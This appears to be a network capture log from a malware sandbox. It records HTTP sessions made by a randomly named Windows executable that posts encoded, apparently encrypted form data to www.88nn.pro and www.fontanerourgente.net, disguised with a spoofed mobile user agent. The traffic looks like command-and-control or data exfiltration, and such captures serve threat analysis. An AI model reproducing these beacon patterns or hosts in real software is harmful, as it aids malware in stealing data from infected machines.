                                        Sep 3, 2024 13:53:32.768455982 CEST1112INData Raw: 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72
                                        Data Ascii: l> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> dwww.weep.site9d/v1m8


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.44973845.157.69.194806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:53:47.873534918 CEST731OUTPOST /l4rw/ HTTP/1.1
                                        Host: www.88nn.pro
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.88nn.pro
                                        Referer: http://www.88nn.pro/l4rw/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 78 2b 74 49 69 4a 6f 4d 35 73 50 69 44 6b 76 54 46 30 41 36 76 46 72 4f 38 57 78 32 34 43 70 48 77 3d 3d
                                        Data Ascii: r8=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkx+tIiJoM5sPiDkvTF0A6vFrO8Wx24CpHw==
                                        Sep 3, 2024 13:53:48.732291937 CEST302INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:53:48 GMT
                                        Content-Type: text/html
                                        Content-Length: 138
                                        Connection: close
                                        ETag: "667cd175-8a"
                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.44973945.157.69.194806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:53:50.418615103 CEST751OUTPOST /l4rw/ HTTP/1.1
                                        Host: www.88nn.pro
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.88nn.pro
                                        Referer: http://www.88nn.pro/l4rw/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4e 39 68 70 67 4f 50 6e 62 4e 47 56 62 71 33 6d 31 36 56 76 4e 69 39 68 30 6d 39 74 37 75 6b 48 38 7a 55 45 6c 6b 48 34 76 4f 48 31 75 6b 70 49 69 34 54 61 48 4e 43 67 36 53 74 36 6f 4e 70 4e 32 70 57 4b 70 68 5a 56 70 55 30 78 48 5a 66 50 5a 63 77 72 49 78 63 51 41 63 45 42 69 7a 46 4c 54 4a 61 41 48 78 46 35 2f 34 79 4d 45 70 4d 6b 4c 71 43 78 52 6e 2b 74 6a 7a 42 47 7a 4e 62 50 4c 41 74 71 6c 31 31 43 30 56 58 6f 76 68 59 54 37 66 46 37 37 2f 67 63 78 76 46 30 73 32 64 5a 79 59 76 4b 38 37 62 54 63 67 67 77 36 59 3d
                                        Data Ascii: r8=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29N9hpgOPnbNGVbq3m16VvNi9h0m9t7ukH8zUElkH4vOH1ukpIi4TaHNCg6St6oNpN2pWKphZVpU0xHZfPZcwrIxcQAcEBizFLTJaAHxF5/4yMEpMkLqCxRn+tjzBGzNbPLAtql11C0VXovhYT7fF77/gcxvF0s2dZyYvK87bTcggw6Y=
                                        Sep 3, 2024 13:53:51.267524004 CEST302INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:53:51 GMT
                                        Content-Type: text/html
                                        Content-Length: 138
                                        Connection: close
                                        ETag: "667cd175-8a"
                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.44974045.157.69.194806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:53:52.967376947 CEST10833OUTPOST /l4rw/ HTTP/1.1
                                        Host: www.88nn.pro
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.88nn.pro
                                        Referer: http://www.88nn.pro/l4rw/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4d 46 68 70 53 57 50 31 6f 6c 47 53 62 71 33 76 56 36 57 76 4e 6a 68 68 77 43 68 74 37 71 72 48 2b 37 55 4c 6e 38 48 76 75 4f 48 38 75 6b 70 42 43 34 51 56 6e 4e 54 67 36 43 78 36 70 39 70 4e 32 70 57 4b 72 35 5a 43 74 49 30 69 58 5a 41 62 4a 63 38 38 59 78 30 51 41 55 36 42 69 6e 56 4c 6a 70 61 41 6d 42 46 36 4a 6b 79 4f 6b 70 4f 6e 4c 71 61 78 52 72 6c 74 6a 66 37 47 7a 34 54 50 4b 34 74 6f 67 63 42 59 6c 74 2f 2b 50 70 72 43 4a 2f 31 31 61 54 4e 52 54 66 4a 33 38 4b 52 4e 68 49 6a 4d 4e 62 4c 58 2b 56 6c 69 2f 5a 76 55 43 45 5a 72 6b 38 69 58 31 68 4d 31 4d 38 47 31 52 37 75 32 47 6a 65 6a 4a 53 56 4a 30 71 48 2f 66 38 7a 78 4c 45 54 64 34 57 51 37 68 6d 4c 33 72 6f 69 73 6c 38 71 69 36 76 4d 68 52 59 4b 66 6a 57 49 79 4d 34 41 79 67 2b 5a 2f 2f 48 6b 32 36 6f 4a 39 78 59 65 67 35 5a 4b 77 30 4f 57 70 4b 58 37 59 2b 36 6e 63 37 2b 37 79 42 2f 45 6a 67 72 75 36 71 67 [TRUNCATED]
                                        Data Ascii: r8=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29MFhpSWP1olGSbq3vV6WvNjhhwCht7qrH+7ULn8HvuOH8ukpBC4QVnNTg6Cx6p9pN2pWKr5ZCtI0iXZAbJc88Yx0QAU6BinVLjpaAmBF6JkyOkpOnLqaxRrltjf7Gz4TPK4togcBYlt/+PprCJ/11aTNRTfJ38KRNhIjMNbLX+Vli/ZvUCEZrk8iX1hM1M8G1R7u2GjejJSVJ0qH/f8zxLETd4WQ7hmL3roisl8qi6vMhRYKfjWIyM4Ayg+Z//Hk26oJ9xYeg5ZKw0OWpKX7Y+6nc7+7yB/Ejgru6qgEMrVSywziwRIliYJGyV25SssQTSr3wv1jr9JySfLZDidr8gDueDcKt9rO+Wwi98XNzIo0fejntyQ+zQMtxBc4xSkhtL/9VInugPVo/qYANhZoXCoEuHg/iss78TuQp6m1bveG8yG1Rtxnbxu3MGK5+jXmWIguuW+Z47pEk5z7dJ4p27EG4wbTAVOHj5/Kj1TxwXTWjHDW8JVGGiE8TvxO54wKnp++opGb3kB81tyMEpB5CPbYyMDuoLVo51SdqYUqr79etNleuybvriVimix5WiUaB1jT5jMsHx/pNb7eO+B5dDgE3lFt8u47WqduySZpEKxLShZXKl/aivY9GPh1DxSNdCJvGgOROCauOyBxrUeK+a2HELAdsW2C+XD/5/jpmgczfd9J8ilscoDvlDmx4c7QRAOqDAMQ0NbiV+MEcMqsLy8ccYvcYnfTCAJkHU//E4ELQc5BMm57yEQILFM3TdPON4HdyLmq1XJS99NONDGB+p4ZA7LJcT55yIfOsia4drNCkFi2olZK/0J83BnDqj+1cYilo347W36FWRRPhnt3LKaYKXEBsBnmUfEVqPT9YoWKiLTemWP5RuzLY8ClCTbESvgWVg5Qt3l/C9qXD+/garr7/GEvnda3Lc6ZLY/c2131Z83DB7TpOT7H/wlRIskcAoZUeeVFz [TRUNCATED]
                                        Sep 3, 2024 13:53:53.803051949 CEST302INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:53:53 GMT
                                        Content-Type: text/html
                                        Content-Length: 138
                                        Connection: close
                                        ETag: "667cd175-8a"
                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.44974145.157.69.194806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:53:55.705291033 CEST478OUTGET /l4rw/?r8=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.88nn.pro
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:53:56.540819883 CEST302INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:53:56 GMT
                                        Content-Type: text/html
                                        Content-Length: 138
                                        Connection: close
                                        ETag: "667cd175-8a"
                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.44974237.187.158.211806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:01.633040905 CEST767OUTPOST /t3gh/ HTTP/1.1
                                        Host: www.fontanerourgente.net
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.fontanerourgente.net
                                        Referer: http://www.fontanerourgente.net/t3gh/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6d 69 66 6c 69 44 55 77 78 65 54 72 47 70 69 62 78 67 63 58 61 38 6e 65 53 49 35 57 6d 44 6c 54 4d 30 77 50 55 78 67 4a 66 4c 72 69 35 43 74 77 4b 69 30 37 73 4b 7a 4d 6c 39 7a 31 43 55 61 32 62 4a 4a 4b 57 2b 31 6e 70 53 56 33 2b 79 44 6b 34 49 6e 66 74 6d 5a 2f 70 62 78 66 79 4a 72 72 6f 71 62 46 5a 70 65 62 59 36 34 4c 69 4b 71 57 44 54 50 56 4a 73 58 64 52 4e 33 66 42 66 70 79 6c 35 66 42 35 54 36 47 47 39 6b 6b 31 39 6f 74 74 57 4f 6c 75 6e 79 6f 39 7a 44 33 6c 38 46 62 43 4e 67 71 70 6a 5a 6c 42 35 65 39 46 34 51 31 30 7a 52 52 31 77 3d 3d
                                        Data Ascii: r8=Q9wnYURzxwjnmifliDUwxeTrGpibxgcXa8neSI5WmDlTM0wPUxgJfLri5CtwKi07sKzMl9z1CUa2bJJKW+1npSV3+yDk4InftmZ/pbxfyJrroqbFZpebY64LiKqWDTPVJsXdRN3fBfpyl5fB5T6GG9kk19ottWOlunyo9zD3l8FbCNgqpjZlB5e9F4Q10zRR1w==
                                        Sep 3, 2024 13:54:02.507756948 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:02 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                                        Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                                        Sep 3, 2024 13:54:02.507776976 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                                        Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                                        Sep 3, 2024 13:54:02.507791996 CEST1236INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                                        Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                                        Sep 3, 2024 13:54:02.507803917 CEST672INData Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                                        Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                                        Sep 3, 2024 13:54:02.507814884 CEST1236INData Raw: 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e
                                        Data Ascii: t;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://mgmasistencia.com/wp-includes/css/dist/blo
                                        Sep 3, 2024 13:54:02.507826090 CEST1236INData Raw: 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65
                                        Data Ascii: ullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote c
                                        Sep 3, 2024 13:54:02.507838964 CEST1236INData Raw: 67 68 74 3a 32 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d
                                        Data Ascii: ght:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}.wp
                                        Sep 3, 2024 13:54:02.507849932 CEST1236INData Raw: 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 46 46 46 46 46 46 3b 2d 2d 77 70 2d 2d
                                        Data Ascii: reset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #FFFFFF;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid
                                        Sep 3, 2024 13:54:02.507860899 CEST1236INData Raw: 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72
                                        Data Ascii: dient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradien
                                        Sep 3, 2024 13:54:02.507874966 CEST1236INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 67 72 65 65 6e 2d 74 6f 2d 79 65 6c 6c 6f 77 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 36 30 64 65 67 2c 20 23 44 31 45 34 44 44 20 30 25 2c 20 23 45 45 45 41
                                        Data Ascii: --wp--preset--gradient--green-to-yellow: linear-gradient(160deg, #D1E4DD 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-green: linear-gradient(160deg, #EEEADD 0%, #D1E4DD 100%);--wp--preset--gradient--red-to-yellow: linear-gradient(160deg
                                        Sep 3, 2024 13:54:02.512782097 CEST1236INData Raw: 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77
                                        Data Ascii: rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.44974337.187.158.211806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:04.189402103 CEST787OUTPOST /t3gh/ HTTP/1.1
                                        Host: www.fontanerourgente.net
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.fontanerourgente.net
                                        Referer: http://www.fontanerourgente.net/t3gh/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6e 47 6a 6c 6b 67 38 77 30 2b 54 6f 4c 35 69 62 6f 51 63 54 61 38 6a 65 53 4a 39 67 6d 78 42 54 4d 52 55 50 62 54 45 4a 65 4c 72 69 33 69 74 78 58 79 30 73 73 4b 2f 75 6c 2f 33 31 43 55 65 32 62 4c 52 4b 52 4a 70 6f 72 43 56 31 79 53 44 71 37 34 6e 66 74 6d 5a 2f 70 62 6c 78 79 4a 6a 72 76 61 72 46 59 4c 32 63 57 61 34 49 6c 4b 71 57 48 54 50 52 4a 73 58 30 52 4a 58 35 42 5a 6c 79 6c 35 50 42 35 6e 4f 46 4e 39 6b 59 37 64 70 63 6b 47 7a 64 72 30 66 6c 38 6c 4c 73 76 38 42 64 4f 72 78 77 34 53 34 79 54 35 36 4f 59 2f 5a 42 35 77 73 59 75 2b 4a 41 65 45 55 78 36 4b 7a 6a 79 73 71 58 71 70 66 52 47 74 51 3d
